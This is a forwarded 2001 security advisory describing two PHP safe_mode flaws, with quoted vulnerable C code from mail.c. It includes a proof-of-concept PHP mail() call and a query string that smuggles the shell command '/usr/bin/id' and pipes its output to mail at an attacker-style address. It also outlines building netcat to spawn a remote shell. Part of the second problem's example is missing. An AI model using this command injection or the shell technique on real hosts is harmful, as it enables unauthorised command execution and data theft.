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[cobalt-security] Fw: [UNIX] PHP Safe_mode Security Flaws

Hi all,
Just received this.
Sweet... Nico
----- Original Message -----
Sent: Wednesday, July 25, 2001 9:57 PM
Subject: [UNIX] PHP Safe_mode Security Flaws

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

PHP Safe_mode Security Flaws

PHP is a simple and efficient scripting language that allows developers to quickly integrate active content into their Web application. Two security vulnerabilities have been found in the way PHP handles certain functions while it is set in safe_mode. These vulnerabilities can cause a system wide compromise.

Vulnerable systems:
PHP version 4.0.5
PHP Version 4.0.4pl1

Problem #1:
An extra 5th parameter was added to the mail() command breaking safe_mode:

 - snippet of the code in mail.c (lines 156-165)

  if (extra_cmd != NULL) {
   strcpy (sendmail_cmd, sendmail_path);
       strcat (sendmail_cmd, " ");
       strcat (sendmail_cmd, extra_cmd);
       } else { sendmail_cmd = sendmail_path;
       sendmail = popen(sendmail_cmd, "w");
                                   } }

 - end of code snippet

The popen() function is the C library function popen(3).

An attacker could easily upload a simple evil.php script containing:

  <? mail("foo@bar,"foo","bar","",$bar); ?>

Then the script could be invoked using a simple query like:

  http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@xxxxxxxxxx

First of all it renders an important part of safe_mode useless.

Two examples come to mind:

Example 1:
A customer has bought some web space from a provider and is given only ftp access to upload his files. The customer is not supposed to have shell access nor view files outside of his home directory.

The customer could easily upload and compile a "light" version of the popular netcat tool (cd /usr/ports/*/netcat;make clean;make&&make install) and spawn himself a remote shell on the hosting box.

If something like suexec is not used by the provider, the shell spawned could in fact be a "nobody" (uid of web server) shell. This could make the situation even worse.

Example 2:
A customer has bought some web space from a provider and was given a shell account on the hosting box.

If something similar to suexec is not running the customer could spawn himself a 'nobody' (www, web, and uid of web server) shell. (See example 1)

The impact of this varies on a per setup/provider basis.

Most providers just do not expect someone to have a shell with the uid of the web server on the hosting box.

"Internal" scripts, database schemes and database password are commonly (but sadly) left owned by the uid/gid of the web server. These become vulnerable.

Even web server configuration files (httpd.conf) and complete web server roots owned by the uid/gid of the web server have been observed in the wild.

Experience learns that when unexpected-nobody access is gained on a (virtual) hosting machine, "bad" things are bound to happen sooner or later.

The 5th argument to mail() should not be honored in safe_mode.

Problem #2:
PHP safe_mode has the nice feature of disallowing the opening/reading and writing to files that are not owned by the uid that the script is owned by.

Though using some "common sense" it still is possible to open/read and write to files that are owned by the uid the web server is running.

This is assuming that something like suexec is not in place.

An attacker could upload a simple script that does the following:

  $cmd = '<? showsource($foo); ?>';

For example, assuming that the error_log is owned by the web server it could be read using a simple query:


Depends on the setup of the hosting box.

Disallow the changing of the error_log location in safe_mode.

Additional Information:
The information has been provided by Joost Pol.


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